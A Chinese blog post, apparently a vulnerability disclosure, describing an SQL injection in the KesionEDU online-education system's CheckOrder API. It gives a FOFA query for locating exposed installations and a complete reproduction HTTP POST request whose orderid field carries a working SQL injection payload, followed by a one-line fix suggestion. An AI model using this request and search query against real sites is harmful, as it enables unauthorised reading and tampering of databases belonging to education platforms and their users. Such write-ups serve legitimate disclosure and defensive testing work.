科汛网校系统KesionEDU CheckOrder SQL注入漏洞

产品简介

科汛网校KesionEDU是KESION科汛(厦门科汛软件有限公司)开发的在线教育建站系统,支持在线直播教学、课程点播、录播授课等多种教学方式,满足不同场景下的教学需求。提供问答互动、学习点评、在线笔记等功能,增强学员与教师之间的互动交流。拥有在线考试系统,支持单选、多选、问答等多种题型,方便学员进行课后测练和考试。供求职招聘功能,方便教育机构网罗各地人才,增强平台吸引力。提供全方位的技术支持和售后服务,确保教育机构在使用过程中无后顾之忧。是教育机构搭建在线教育平台的理想选择,利用测绘引擎搜索发现影响资产1100+。

漏洞描述

SQL注入被广泛用于非法入侵网站服务器,获取网站控制权。它是应用层上的一种安全漏洞。通常在设计存在缺陷的程序中,对用户输入的数据没有做好过滤,导致恶意用户可以构造一些SQL语句让服务器去执行,从而导致数据库中的数据被窃取,篡改,删除,以及进一步导致服务器被入侵等危害。

Fofa语法

1
body="/KS_Inc/static/edu"

漏洞复现

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /webapi/APP/CheckOrder HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Connection: close
Content-Length: 242
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Priority: u=0
X-Requested-With: XMLHttpRequest

{"orderid":"1' AND 7755 IN (SELECT (CHAR(113)+CHAR(107)+CHAR(112)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (7755=7755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(107)+CHAR(113)))-- Ahbw","apptoken":"1","ordertype":"1"}

修复建议

关闭互联网暴露面或接口设置访问权限,官方已经推出新版本,建议升级到最新版。

科汛网校系统KesionEDU CheckOrder SQL注入漏洞
https://savior-only.github.io/p/f1b3b83655a44884868ef8f4c95efbab/
作者
savior
发布于
2024年12月27日
更新于
2024年12月27日
许可协议